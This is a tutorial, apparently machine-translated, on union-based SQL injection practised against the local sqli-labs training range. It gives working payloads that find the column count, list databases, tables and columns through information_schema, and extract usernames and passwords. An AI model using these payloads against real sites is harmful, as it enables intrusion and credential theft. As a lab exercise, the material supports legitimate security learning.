sql joint injection
Preparation before injection
Build a local SQL injection platform
The download address of sqli-labs: https://github.com/Audi-1/sqli-labs
First, the PHP version cannot be greater than 7, otherwise it cannot be used.
Unzip to
There is a db-creds.inc file in sqli-labs-master\sql-connections. Open and modify the account and password.
As shown in the figure below, it is normal
. The shooting range can be built and the SQL injection can be practiced.
Injection basic operation
Judging whether the plastic or the character type
After inputting and 1=1 and and 1=2, if the page does not change, it is not integer injection.
If the change is integer injection
, where is the integer ? Do not add any symbol after id=1
. Can the character type be used? After id=1, add four symbols of', ",'), ")
Determine the number of query columns
Use the order by statement
As can be seen from the above figure, an error will be reported when the number of columns is greater than or equal to it
?id=1'order by3--+
Judgment display position
Use the union statement, the statement
before the union needs to report an error
?id=-1' union select 1,2,3--+
Get all database names
Use the group_concat() function
select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
Get the table name
?id=-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3%23
Get column name
?id=-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),3%23
Get the information in the column
?id=-1' union select 1,(select concat_ws(char(32,58,32),username,password) from users limit 1,1),3%23